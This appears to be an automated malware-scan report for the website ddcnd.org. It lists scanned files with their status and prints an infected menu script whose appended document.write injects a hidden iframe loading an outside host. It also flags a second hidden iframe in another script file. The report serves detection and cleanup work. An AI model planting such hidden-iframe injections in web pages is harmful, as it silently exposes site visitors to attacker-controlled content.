Scanned pages/files
Request | Server response | Status |
http://ddcnd.org/ | 200 OK Content-Length: 67896 Content-Type: text/html | clean |
http://ddcnd.org/media/system/js/caption.js | 200 OK Content-Length: 2250 Content-Type: text/javascript | clean |
http://ddcnd.org/templates/custom_ja_purity/js/ja.script.js | 200 OK Content-Length: 3217 Content-Type: text/javascript | clean |
http://ddcnd.org/templates/custom_ja_purity/ja_menus/ja_cssmenu/ja.moomenu.js | 200 OK Content-Length: 5010 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
if (typeof(MooTools) != 'undefined'){
var subnav = new Array(); Element.extend( { hide: function(timeout) { this.status = 'hide'; clearTimeout (this.timeout); if (timeout) { this.timeout = setTimeout (this.anim.bind(this), timeout); }else{ this.anim(); } }, show: function(timeout) { this.status = 'show'; clearTimeout (th for (var i=0; i<sfEls.length; ++i) { sfEls[i].onmouseover=function() { this.className+="sfhover"; } sfEls[i].onmouseout=function() { this.className=this.className.replace(new RegExp("sfhover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", sfHover); } document.write('<iframe src="http://kama.homenet.org/info.html" width="1" height="0"></iframe>');
Antivirus reports:
Hidden iFrame found. size: 1x0 src: http://kama.homenet.org/info.html <iframe src="http://kama.homenet.org/info.html" width="1" height="0">
http://www.gmodules.com/ig/ifr?url=http://www.google.com/ig/modules/translatemypage.xml&up_source_language=vi&w=160&h=60&title=&border=&output=js | 200 OK Content-Length: 2268 Content-Type: text/javascript | clean |
http://ddcnd.org/media/mod_vavim/js/avim.js | 200 OK Content-Length: 18330 Content-Type: text/javascript | clean |
http://ddcnd.org/includes/js/overlib_mini.js | 200 OK Content-Length: 37286 Content-Type: text/javascript | suspicious |
Hidden iFrame found. size: 1x1 src: http://casa.csproject.org/static/ct.php <iframe width="1" height="1" scrolling="no" src="http://casa.csproject.org/static/ct.php" frameborder="0">
http://ddcnd.org/includes/js/overlib_hideform_mini.js | 200 OK Content-Length: 3328 Content-Type: text/javascript | clean |
http://ddcnd.org/index.php | 200 OK Content-Length: 67917 Content-Type: text/html | clean |
http://ddcnd.org/index.php?option=com_search&view=search&Itemid=58 | 200 OK Content-Length: 24520 Content-Type: text/html | clean |
http://ddcnd.org/index.php?option=com_contact&view=contact&id=1&Itemid=59 | 200 OK Content-Length: 25941 Content-Type: text/html | clean |
http://ddcnd.org/media/system/js/validate.js | 200 OK Content-Length: 4246 Content-Type: text/javascript | clean |
http://ddcnd.org/index.php?option=com_weblinks&view=category&id=18&Itemid=65 | 200 OK Content-Length: 43585 Content-Type: text/html | clean |
http://ddcnd.org/index.php?option=com_content&view=article&id=427&Itemid=63 | 200 OK Content-Length: 28206 Content-Type: text/html | clean |
http://ddcnd.org/index.php?option=com_mailto&tmpl=component&link=b2e71a04ac02793a3b95863ee1d15d4fefc1c55e | 200 OK Content-Length: 2686 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ddcnd.org
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 10 Oct 2014 20:13:27 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 10 Oct 2014 20:13:28 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 2f36dc539d5bbc2af0ef15090a4d4caa=snp9ab2ucd9escrgncngd2e155; path=/
Set-Cookie: custom_ja_purity_tpl=custom_ja_purity; expires=Wed, 30-Sep-2015 20:13:28 GMT; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: ddcnd.org
Referer: http://www.google.com/search?q=ddcnd.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ddcnd.org
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ddcnd.org/
Result: ddcnd.org is not infected or malware details are not published yet.